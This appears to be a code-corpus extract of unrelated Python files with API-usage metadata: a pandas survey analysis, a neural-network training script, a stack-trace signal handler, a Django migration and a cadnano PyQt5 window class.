country_grp["ConvertedComp"].agg(["median", "mean"])
# %%
country_grp["ConvertedComp"].agg(["median", "mean"]).loc["Canada"]
# %%
filt = (df["Country"] == "India")
df.loc[filt]["LanguageWorkedWith"]
# %%
df.loc[filt]["LanguageWorkedWith"].str.contains("Python")
# %%
"""
True : 1
False : 0
"""
df.loc[filt]["LanguageWorkedWith"].str.contains("Python").sum()
# %%
"""
It will raise an error.
country_grp["LanguageWorkedWith"].str.contains("Python").sum()
AttributeError: 'SeriesGroupBy' object has no attribute 'str'
"""
country_grp["LanguageWorkedWith"].apply(
lambda x: x.str.contains("Python").sum())
# %%
country_respondents = df["Country"].value_counts()
country_respondents
# %%
country_uses_python = country_grp["LanguageWorkedWith"].apply(
lambda x: x.str.contains("Python").sum())
country_uses_python
# %%
"""Concatenate two columns to make a new dataframe."""
python_df = pd.concat(
[country_respondents, country_uses_python], axis="columns", sort=False)
python_df
# %%
python_df.rename(columns={"Country": "NumRespondants",
"LanguageWorkedWith": "NumKnowsPython"},
inplace=True)
# %%
python_df
# %%
python_df["PctKnowsPython"] = (
python_df["NumKnowsPython"]/python_df["NumRespondants"]*100)
# %%
python_df
# %%
python_df.sort_values(by="PctKnowsPython", ascending=False, inplace=True)
# %%
python_df
# %%
python_df.head(50)
# %%
python_df.loc["Japan"]
# %%
python_df.sort_values(
by=["NumRespondants", "PctKnowsPython"], ascending=False, inplace=True)
# %%
python_df.head(50)
# %%
| [
"pandas.concat",
"pandas.read_csv",
"pandas.set_option"
] | [((228, 319), 'pandas.read_csv', 'pd.read_csv', (['"""developer_survey_2019/survey_results_public.csv"""'], {'index_col': '"""Respondent"""'}), "('developer_survey_2019/survey_results_public.csv', index_col=\n 'Respondent')\n", (239, 319), True, 'import pandas as pd\n'), ((334, 421), 'pandas.read_csv', 'pd.read_csv', (['"""developer_survey_2019/survey_results_schema.csv"""'], {'index_col': '"""Column"""'}), "('developer_survey_2019/survey_results_schema.csv', index_col=\n 'Column')\n", (345, 421), True, 'import pandas as pd\n'), ((430, 470), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(85)'], {}), "('display.max_columns', 85)\n", (443, 470), True, 'import pandas as pd\n'), ((472, 509), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(85)'], {}), "('display.max_rows', 85)\n", (485, 509), True, 'import pandas as pd\n'), ((2996, 3082), 'pandas.concat', 'pd.concat', (['[country_respondents, country_uses_python]'], {'axis': '"""columns"""', 'sort': '(False)'}), "([country_respondents, country_uses_python], axis='columns', sort=\n False)\n", (3005, 3082), True, 'import pandas as pd\n')] |
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import minmax_scale
import matplotlib.pyplot as plt
from model.loss import CategoricalCrossEntropy
from model.layers.dense import Dense
from model.layers.relu import LeakyReLU
from model.layers.softmax import Softmax
from model.neural_network import NeuralNetwork
def spiral_data(points, classes):
X = np.zeros((points * classes, 2))
y = np.zeros(points * classes, dtype='uint8')
for class_number in range(classes):
ix = range(points * class_number, points * (class_number + 1))
r = np.linspace(0.0, 1, points) # radius
t = np.linspace(class_number * 4, (class_number + 1) * 4, points) + np.random.randn(points) * 0.2
X[ix] = np.c_[r * np.sin(t * 2.5), r * np.cos(t * 2.5)]
y[ix] = class_number
return X, y
# ------------------------------------ DATASET
N = 200 # number of points per class
D = 2 # dimensionality
K = 3 # number of classes
X, y = spiral_data(points=N, classes=K)
print("Scale values")
print('Min: %.3f, Max: %.3f' % (X.min(), X.max()))
X = minmax_scale(X, feature_range=(0, 1))
print('Min: %.3f, Max: %.3f' % (X.min(), X.max()))
# plt.scatter(X[:, 0], X[:, 1], c=y, s=40, cmap=plt.cm.Spectral)
# plt.show()
# ------------------------------------ SPLIT DATA
"""X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=0.1,
random_state=65)"""
# ------------------------------------ HYPER PARAMETERS
STEP_SIZE = 1e-1
N_EPOCHS = 2000
BATCH_SIZE = 32
# ------------------------------------ BUILD THE MODEL
nn = NeuralNetwork([
Dense(200), LeakyReLU(),
Dense(100), LeakyReLU(),
Dense(50), LeakyReLU(),
Dense(K), Softmax()
], CategoricalCrossEntropy())
# ------------------------------------ FIT THE MODEL
nn.train(dataset=X,
labels=y,
epochs=N_EPOCHS,
batch_size=BATCH_SIZE,
step_size=STEP_SIZE)
# ------------------------------------ EVALUATE THE MODEL
train_loss = nn.metrics.history['train_loss']
val_loss = nn.metrics.history['val_loss']
epochs = range(0, N_EPOCHS)
plt.plot(epochs, train_loss, 'g', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='validation loss')
plt.title('Training and Validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
print(f"train loss: {train_loss}")
print(f"val loss: {val_loss}")
train_acc = nn.metrics.history['train_acc']
val_acc = nn.metrics.history['val_acc']
epochs = range(0, N_EPOCHS)
plt.plot(epochs, train_acc, 'g', label='Training accuracy')
plt.plot(epochs, val_acc, 'b', label='validation accuracy')
plt.title('Training and Validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
print(f"train acc: {train_acc}")
print(f"val acc: {val_acc}")
| [
"model.loss.CategoricalCrossEntropy",
"model.layers.relu.LeakyReLU",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"model.layers.dense.Dense",
"numpy.zeros",
"numpy.linspace",
"sklearn.preprocessing.minmax_scale",
"model.layers.softmax.Softmax",
"numpy.cos",
... | [((1123, 1160), 'sklearn.preprocessing.minmax_scale', 'minmax_scale', (['X'], {'feature_range': '(0, 1)'}), '(X, feature_range=(0, 1))\n', (1135, 1160), False, 'from sklearn.preprocessing import minmax_scale\n'), ((2273, 2329), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'train_loss', '"""g"""'], {'label': '"""Training loss"""'}), "(epochs, train_loss, 'g', label='Training loss')\n", (2281, 2329), True, 'import matplotlib.pyplot as plt\n'), ((2330, 2386), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_loss', '"""b"""'], {'label': '"""validation loss"""'}), "(epochs, val_loss, 'b', label='validation loss')\n", (2338, 2386), True, 'import matplotlib.pyplot as plt\n'), ((2387, 2428), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and Validation loss"""'], {}), "('Training and Validation loss')\n", (2396, 2428), True, 'import matplotlib.pyplot as plt\n'), ((2429, 2449), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (2439, 2449), True, 'import matplotlib.pyplot as plt\n'), ((2450, 2468), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Loss"""'], {}), "('Loss')\n", (2460, 2468), True, 'import matplotlib.pyplot as plt\n'), ((2469, 2481), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2479, 2481), True, 'import matplotlib.pyplot as plt\n'), ((2482, 2492), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2490, 2492), True, 'import matplotlib.pyplot as plt\n'), ((2673, 2732), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'train_acc', '"""g"""'], {'label': '"""Training accuracy"""'}), "(epochs, train_acc, 'g', label='Training accuracy')\n", (2681, 2732), True, 'import matplotlib.pyplot as plt\n'), ((2733, 2792), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_acc', '"""b"""'], {'label': '"""validation accuracy"""'}), "(epochs, val_acc, 'b', label='validation accuracy')\n", (2741, 2792), True, 'import matplotlib.pyplot as plt\n'), ((2793, 2838), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and Validation accuracy"""'], {}), "('Training and Validation accuracy')\n", (2802, 2838), True, 'import matplotlib.pyplot as plt\n'), ((2839, 2859), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (2849, 2859), True, 'import matplotlib.pyplot as plt\n'), ((2860, 2882), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Accuracy"""'], {}), "('Accuracy')\n", (2870, 2882), True, 'import matplotlib.pyplot as plt\n'), ((2883, 2895), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2893, 2895), True, 'import matplotlib.pyplot as plt\n'), ((2896, 2906), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2904, 2906), True, 'import matplotlib.pyplot as plt\n'), ((408, 439), 'numpy.zeros', 'np.zeros', (['(points * classes, 2)'], {}), '((points * classes, 2))\n', (416, 439), True, 'import numpy as np\n'), ((448, 489), 'numpy.zeros', 'np.zeros', (['(points * classes)'], {'dtype': '"""uint8"""'}), "(points * classes, dtype='uint8')\n", (456, 489), True, 'import numpy as np\n'), ((1890, 1915), 'model.loss.CategoricalCrossEntropy', 'CategoricalCrossEntropy', ([], {}), '()\n', (1913, 1915), False, 'from model.loss import CategoricalCrossEntropy\n'), ((613, 640), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1)', 'points'], {}), '(0.0, 1, points)\n', (624, 640), True, 'import numpy as np\n'), ((1781, 1791), 'model.layers.dense.Dense', 'Dense', (['(200)'], {}), '(200)\n', (1786, 1791), False, 'from model.layers.dense import Dense\n'), ((1793, 1804), 'model.layers.relu.LeakyReLU', 'LeakyReLU', ([], {}), '()\n', (1802, 1804), False, 'from model.layers.relu import LeakyReLU\n'), ((1810, 1820), 'model.layers.dense.Dense', 'Dense', (['(100)'], {}), '(100)\n', (1815, 1820), False, 'from model.layers.dense import Dense\n'), ((1822, 1833), 'model.layers.relu.LeakyReLU', 'LeakyReLU', ([], {}), '()\n', (1831, 1833), False, 'from model.layers.relu import LeakyReLU\n'), ((1839, 1848), 'model.layers.dense.Dense', 'Dense', (['(50)'], {}), '(50)\n', (1844, 1848), False, 'from model.layers.dense import Dense\n'), ((1850, 1861), 'model.layers.relu.LeakyReLU', 'LeakyReLU', ([], {}), '()\n', (1859, 1861), False, 'from model.layers.relu import LeakyReLU\n'), ((1867, 1875), 'model.layers.dense.Dense', 'Dense', (['K'], {}), '(K)\n', (1872, 1875), False, 'from model.layers.dense import Dense\n'), ((1877, 1886), 'model.layers.softmax.Softmax', 'Softmax', ([], {}), '()\n', (1884, 1886), False, 'from model.layers.softmax import Softmax\n'), ((663, 724), 'numpy.linspace', 'np.linspace', (['(class_number * 4)', '((class_number + 1) * 4)', 'points'], {}), '(class_number * 4, (class_number + 1) * 4, points)\n', (674, 724), True, 'import numpy as np\n'), ((727, 750), 'numpy.random.randn', 'np.random.randn', (['points'], {}), '(points)\n', (742, 750), True, 'import numpy as np\n'), ((783, 798), 'numpy.sin', 'np.sin', (['(t * 2.5)'], {}), '(t * 2.5)\n', (789, 798), True, 'import numpy as np\n'), ((804, 819), 'numpy.cos', 'np.cos', (['(t * 2.5)'], {}), '(t * 2.5)\n', (810, 819), True, 'import numpy as np\n')] |
# Copyright (C) 2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import linecache
import logging
import os
import signal
import sys
_log = logging.getLogger(__name__)
def log_stack_trace(frame, file):
file.write('Traceback(most recent call last):\n')
def func(frame):
if not frame:
return
func(frame.f_back)
file.write(' File "{}", line {}, in {}\n'.format(frame.f_code.co_filename, frame.f_lineno, frame.f_code.co_name))
file.write(' {}\n'.format(linecache.getline(frame.f_code.co_filename, frame.f_lineno).lstrip().rstrip()))
func(frame)
class StackTraceFileContext(object):
def __init__(self, output_file=None):
self.file_name = None
if output_file:
self.file_name = os.path.join(os.path.dirname(output_file), '{}-{}'.format(os.getpid(), os.path.basename(output_file)))
self.file = sys.stderr
def __enter__(self):
if self.file_name:
self.file = open(self.file_name, 'w')
_log.critical('Stack trace saved to {}'.format(self.file_name))
else:
self.file.write('\n')
return self.file
def __exit__(self, *args):
if self.file_name:
self.file.close()
self.file = sys.stderr
def log_stack_trace_on_term(output_file=None):
def handler(signum, frame):
with StackTraceFileContext(output_file=output_file) as file:
file.write('SIGTERM signal received')
log_stack_trace(frame, file)
exit(-1)
signal.signal(signal.SIGTERM, handler)
def log_stack_trace_on_ctrl_c(output_file=None):
def handler(signum, frame):
with StackTraceFileContext(output_file=output_file) as file:
file.write('CTRL+C received\n')
log_stack_trace(frame, file)
raise KeyboardInterrupt
signal.signal(signal.SIGINT, handler)
| [
"logging.getLogger",
"signal.signal",
"os.path.dirname",
"os.path.basename",
"os.getpid",
"linecache.getline"
] | [((1405, 1432), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1422, 1432), False, 'import logging\n'), ((2804, 2842), 'signal.signal', 'signal.signal', (['signal.SIGTERM', 'handler'], {}), '(signal.SIGTERM, handler)\n', (2817, 2842), False, 'import signal\n'), ((3118, 3155), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'handler'], {}), '(signal.SIGINT, handler)\n', (3131, 3155), False, 'import signal\n'), ((2047, 2075), 'os.path.dirname', 'os.path.dirname', (['output_file'], {}), '(output_file)\n', (2062, 2075), False, 'import os\n'), ((2092, 2103), 'os.getpid', 'os.getpid', ([], {}), '()\n', (2101, 2103), False, 'import os\n'), ((2105, 2134), 'os.path.basename', 'os.path.basename', (['output_file'], {}), '(output_file)\n', (2121, 2134), False, 'import os\n'), ((1773, 1832), 'linecache.getline', 'linecache.getline', (['frame.f_code.co_filename', 'frame.f_lineno'], {}), '(frame.f_code.co_filename, frame.f_lineno)\n', (1790, 1832), False, 'import linecache\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-10 16:15
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import items.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='title')),
('description', models.TextField(blank=True, null=True, verbose_name='description')),
('image', models.ImageField(upload_to=items.models.image_upload_to, verbose_name='original image')),
],
options={
'abstract': False,
},
),
]
| [
"django.db.models.ImageField",
"django.db.models.TextField",
"django.db.models.AutoField",
"django.db.models.CharField"
] | [((418, 511), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (434, 511), False, 'from django.db import migrations, models\n'), ((784, 838), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'verbose_name': '"""title"""'}), "(max_length=255, verbose_name='title')\n", (800, 838), False, 'from django.db import migrations, models\n'), ((873, 940), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'null': '(True)', 'verbose_name': '"""description"""'}), "(blank=True, null=True, verbose_name='description')\n", (889, 940), False, 'from django.db import migrations, models\n'), ((969, 1062), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'items.models.image_upload_to', 'verbose_name': '"""original image"""'}), "(upload_to=items.models.image_upload_to, verbose_name=\n 'original image')\n", (986, 1062), False, 'from django.db import migrations, models\n')] |
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QSettings
from PyQt5.QtCore import QPoint, QSize
from PyQt5.QtWidgets import QGraphicsScene
from PyQt5.QtWidgets import QMainWindow
from PyQt5.QtWidgets import QGraphicsItem
from PyQt5.QtWidgets import QAction, QApplication, QWidget
from cadnano import app
from cadnano.gui.mainwindow import ui_mainwindow
from cadnano.proxies.cnenum import OrthoViewType
from cadnano.views.gridview.gridrootitem import GridRootItem
from cadnano.views.gridview.tools.gridtoolmanager import GridToolManager
from cadnano.views.pathview.colorpanel import ColorPanel
from cadnano.views.pathview.pathrootitem import PathRootItem
from cadnano.views.pathview.tools.pathtoolmanager import PathToolManager
from cadnano.views.sliceview.slicerootitem import SliceRootItem
from cadnano.views.sliceview.tools.slicetoolmanager import SliceToolManager
# from PyQt5.QtOpenGL import QGLWidget
# # check out https://github.com/baoboa/pyqt5/tree/master/examples/opengl
# # for an example of the QOpenGlWidget added in Qt 5.4
class DocumentWindow(QMainWindow, ui_mainwindow.Ui_MainWindow):
"""DocumentWindow subclasses QMainWindow and Ui_MainWindow. It performs
some initialization operations that must be done in code rather than
using Qt Creator.
Attributes:
controller (DocumentController):
"""
def __init__(self, parent=None, doc_ctrlr=None):
super(DocumentWindow, self).__init__(parent)
self.controller = doc_ctrlr
doc = doc_ctrlr.document()
self.setupUi(self)
self.settings = QSettings("cadnano.org", "cadnano2.5")
# Appearance pref
if not app().prefs.show_icon_labels:
self.main_toolbar.setToolButtonStyle(Qt.ToolButtonIconOnly)
# Outliner & PropertyEditor setup
self.outliner_widget.configure(window=self, document=doc)
self.property_widget.configure(window=self, document=doc)
self.property_buttonbox.setVisible(False)
self.tool_managers = None # initialize
self._initSliceview(doc)
self._initGridview(doc)
self._initPathview(doc)
self._initPathviewToolbar()
self._initEditMenu()
self.path_dock_widget.setTitleBarWidget(QWidget())
self.grid_dock_widget.setTitleBarWidget(QWidget())
self.slice_dock_widget.setTitleBarWidget(QWidget())
self.inspector_dock_widget.setTitleBarWidget(QWidget())
self.setCentralWidget(None)
if app().prefs.orthoview_style == OrthoViewType.SLICE:
self.splitDockWidget(self.slice_dock_widget, self.path_dock_widget, Qt.Horizontal)
elif app().prefs.orthoview_style == OrthoViewType.GRID:
self.splitDockWidget(self.grid_dock_widget, self.path_dock_widget, Qt.Horizontal)
self._restoreGeometryandState()
self._finishInit()
doc.setViewNames(['slice', 'path', 'inspector'])
# end def
def document(self):
return self.controller.document()
def destroyWin(self):
self.settings.beginGroup("MainWindow")
self.settings.setValue("state", self.saveState())
self.settings.endGroup()
for mgr in self.tool_managers:
mgr.destroy()
self.controller = None
### ACCESSORS ###
def undoStack(self):
return self.controller.undoStack()
def selectedInstance(self):
return self.controller.document().selectedInstance()
def activateSelection(self, isActive):
self.path_graphics_view.activateSelection(isActive)
self.slice_graphics_view.activateSelection(isActive)
self.grid_graphics_view.activateSelection(isActive)
### EVENT HANDLERS ###
def focusInEvent(self):
"""Handle an OS focus change into cadnano."""
app().undoGroup.setActiveStack(self.controller.undoStack())
def moveEvent(self, event):
"""Handle the moving of the cadnano window itself.
Reimplemented to save state on move.
"""
self.settings.beginGroup("MainWindow")
self.settings.setValue("geometry", self.saveGeometry())
self.settings.setValue("pos", self.pos())
self.settings.endGroup()
def resizeEvent(self, event):
"""Handle the resizing of the cadnano window itself.
Reimplemented to save state on resize.
"""
self.settings.beginGroup("MainWindow")
self.settings.setValue("geometry", self.saveGeometry())
self.settings.setValue("size", self.size())
self.settings.endGroup()
QWidget.resizeEvent(self, event)
def changeEvent(self, event):
QWidget.changeEvent(self, event)
# end def
### DRAWING RELATED ###
### PRIVATE HELPER METHODS ###
def _restoreGeometryandState(self):
self.settings.beginGroup("MainWindow")
geometry = self.settings.value("geometry")
state = self.settings.value("geometry")
if geometry is not None:
result = self.restoreGeometry(geometry)
if result is False:
print("MainWindow.restoreGeometry() failed.")
else:
print("Setting default MainWindow size: 1100x800")
self.resize(self.settings.value("size", QSize(1100, 800)))
self.move(self.settings.value("pos", QPoint(200, 200)))
self.inspector_dock_widget.close()
self.action_inspector.setChecked(False)
state = self.settings.value("state")
if state is not None:
result = self.restoreState(state)
if result is False:
print("MainWindow.restoreState() failed.")
self.settings.endGroup()
# end def
def _initGridview(self, doc):
"""Initializes Grid View.
Args:
doc (cadnano.document.Document): The Document corresponding to
the design
Returns: None
"""
self.grid_scene = QGraphicsScene(parent=self.grid_graphics_view)
self.grid_root = GridRootItem(rect=self.grid_scene.sceneRect(),
parent=None,
window=self,
document=doc)
self.grid_root.setFlag(QGraphicsItem.ItemHasNoContents)
self.grid_scene.addItem(self.grid_root)
self.grid_scene.setItemIndexMethod(QGraphicsScene.NoIndex)
assert self.grid_root.scene() == self.grid_scene
self.grid_graphics_view.setScene(self.grid_scene)
self.grid_graphics_view.scene_root_item = self.grid_root
self.grid_graphics_view.setName("GridView")
self.grid_tool_manager = GridToolManager(self, self.grid_root)
# end def
def _initPathview(self, doc):
"""Initializes Path View.
Args:
doc (cadnano.document.Document): The Document corresponding to
the design
Returns: None
"""
self.path_scene = QGraphicsScene(parent=self.path_graphics_view)
self.path_root = PathRootItem(rect=self.path_scene.sceneRect(),
parent=None,
window=self,
document=doc)
self.path_root.setFlag(QGraphicsItem.ItemHasNoContents)
self.path_scene.addItem(self.path_root)
self.path_scene.setItemIndexMethod(QGraphicsScene.NoIndex)
assert self.path_root.scene() == self.path_scene
self.path_graphics_view.setScene(self.path_scene)
self.path_graphics_view.scene_root_item = self.path_root
self.path_graphics_view.setScaleFitFactor(0.7)
self.path_graphics_view.setName("PathView")
# end def
def _initPathviewToolbar(self):
"""Initializes Path View Toolbar.
Returns: None
"""
self.path_color_panel = ColorPanel()
self.path_graphics_view.toolbar = self.path_color_panel # HACK for customqgraphicsview
self.path_scene.addItem(self.path_color_panel)
self.path_tool_manager = PathToolManager(self, self.path_root)
self.slice_tool_manager.path_tool_manager = self.path_tool_manager
self.path_tool_manager.slice_tool_manager = self.slice_tool_manager
self.grid_tool_manager.path_tool_manager = self.path_tool_manager
self.path_tool_manager.grid_tool_manager = self.grid_tool_manager
self.tool_managers = (self.path_tool_manager, self.slice_tool_manager, self.grid_tool_manager)
self.insertToolBarBreak(self.main_toolbar)
self.path_graphics_view.setupGL()
self.slice_graphics_view.setupGL()
self.grid_graphics_view.setupGL()
# end def
def _initSliceview(self, doc):
"""Initializes Slice View.
Args:
doc (cadnano.document.Document): The Document corresponding to
the design
Returns: None
"""
self.slice_scene = QGraphicsScene(parent=self.slice_graphics_view)
self.slice_root = SliceRootItem(rect=self.slice_scene.sceneRect(),
parent=None,
window=self,
document=doc)
self.slice_root.setFlag(QGraphicsItem.ItemHasNoContents)
self.slice_scene.addItem(self.slice_root)
self.slice_scene.setItemIndexMethod(QGraphicsScene.NoIndex)
assert self.slice_root.scene() == self.slice_scene
self.slice_graphics_view.setScene(self.slice_scene)
self.slice_graphics_view.scene_root_item = self.slice_root
self.slice_graphics_view.setName("SliceView")
self.slice_graphics_view.setScaleFitFactor(0.7)
self.slice_tool_manager = SliceToolManager(self, self.slice_root)
# end def
def _initEditMenu(self):
"""Initializes the Edit menu
Returns: None
"""
self.actionUndo = self.controller.undoStack().createUndoAction(self)
self.actionRedo = self.controller.undoStack().createRedoAction(self)
self.actionUndo.setText(QApplication.translate("MainWindow", "Undo", None))
self.actionUndo.setShortcut(QApplication.translate("MainWindow", "Ctrl+Z", None))
self.actionRedo.setText(QApplication.translate("MainWindow", "Redo", None))
self.actionRedo.setShortcut(QApplication.translate("MainWindow", "Ctrl+Shift+Z", None))
self.sep = QAction(self)
self.sep.setSeparator(True)
self.menu_edit.insertAction(self.sep, self.actionRedo)
self.menu_edit.insertAction(self.actionRedo, self.actionUndo)
# self.main_splitter.setSizes([400, 400, 180]) # balance main_splitter size
self.statusBar().showMessage("")
# end def
def _finishInit(self):
"""
Handle the dockwindow visibility and action checked status.
The console visibility is explicitly stored in the settings file,
since it doesn't seem to work if we treat it like a normal dock widget.
"""
inspector_visible = self.inspector_dock_widget.isVisibleTo(self)
self.action_inspector.setChecked(inspector_visible)
path_visible = self.path_dock_widget.isVisibleTo(self)
self.action_path.setChecked(path_visible)
slice_visible = self.slice_dock_widget.isVisibleTo(self)
self.action_slice.setChecked(slice_visible)
# end def
# end class
| [
"PyQt5.QtWidgets.QWidget",
"cadnano.views.sliceview.tools.slicetoolmanager.SliceToolManager",
"PyQt5.QtWidgets.QApplication.translate",
"cadnano.app",
"PyQt5.QtWidgets.QAction",
"PyQt5.QtWidgets.QWidget.resizeEvent",
"PyQt5.QtWidgets.QWidget.changeEvent",
"cadnano.views.gridview.tools.gridtoolmanager.... | [((1579, 1617), 'PyQt5.QtCore.QSettings', 'QSettings', (['"""cadnano.org"""', '"""cadnano2.5"""'], {}), "('cadnano.org', 'cadnano2.5')\n", (1588, 1617), False, 'from PyQt5.QtCore import QSettings\n'), ((4553, 4585), 'PyQt5.QtWidgets.QWidget.resizeEvent', 'QWidget.resizeEvent', (['self', 'event'], {}), '(self, event)\n', (4572, 4585), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((4629, 4661), 'PyQt5.QtWidgets.QWidget.changeEvent', 'QWidget.changeEvent', (['self', 'event'], {}), '(self, event)\n', (4648, 4661), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((5924, 5970), 'PyQt5.QtWidgets.QGraphicsScene', 'QGraphicsScene', ([], {'parent': 'self.grid_graphics_view'}), '(parent=self.grid_graphics_view)\n', (5938, 5970), False, 'from PyQt5.QtWidgets import QGraphicsScene\n'), ((6641, 6678), 'cadnano.views.gridview.tools.gridtoolmanager.GridToolManager', 'GridToolManager', (['self', 'self.grid_root'], {}), '(self, self.grid_root)\n', (6656, 6678), False, 'from cadnano.views.gridview.tools.gridtoolmanager import GridToolManager\n'), ((6936, 6982), 'PyQt5.QtWidgets.QGraphicsScene', 'QGraphicsScene', ([], {'parent': 'self.path_graphics_view'}), '(parent=self.path_graphics_view)\n', (6950, 6982), False, 'from PyQt5.QtWidgets import QGraphicsScene\n'), ((7835, 7847), 'cadnano.views.pathview.colorpanel.ColorPanel', 'ColorPanel', ([], {}), '()\n', (7845, 7847), False, 'from cadnano.views.pathview.colorpanel import ColorPanel\n'), ((8032, 8069), 'cadnano.views.pathview.tools.pathtoolmanager.PathToolManager', 'PathToolManager', (['self', 'self.path_root'], {}), '(self, self.path_root)\n', (8047, 8069), False, 'from cadnano.views.pathview.tools.pathtoolmanager import PathToolManager\n'), ((8915, 8962), 'PyQt5.QtWidgets.QGraphicsScene', 'QGraphicsScene', ([], {'parent': 'self.slice_graphics_view'}), '(parent=self.slice_graphics_view)\n', (8929, 8962), False, 'from PyQt5.QtWidgets import QGraphicsScene\n'), ((9711, 9750), 'cadnano.views.sliceview.tools.slicetoolmanager.SliceToolManager', 'SliceToolManager', (['self', 'self.slice_root'], {}), '(self, self.slice_root)\n', (9727, 9750), False, 'from cadnano.views.sliceview.tools.slicetoolmanager import SliceToolManager\n'), ((10394, 10407), 'PyQt5.QtWidgets.QAction', 'QAction', (['self'], {}), '(self)\n', (10401, 10407), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2247, 2256), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2254, 2256), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2306, 2315), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2313, 2315), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2366, 2375), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2373, 2375), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2430, 2439), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2437, 2439), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10053, 10103), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', '"""Undo"""', 'None'], {}), "('MainWindow', 'Undo', None)\n", (10075, 10103), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10141, 10193), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', '"""Ctrl+Z"""', 'None'], {}), "('MainWindow', 'Ctrl+Z', None)\n", (10163, 10193), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10227, 10277), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', '"""Redo"""', 'None'], {}), "('MainWindow', 'Redo', None)\n", (10249, 10277), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10315, 10373), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', '"""Ctrl+Shift+Z"""', 'None'], {}), "('MainWindow', 'Ctrl+Shift+Z', None)\n", (10337, 10373), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((1659, 1664), 'cadnano.app', 'app', ([], {}), 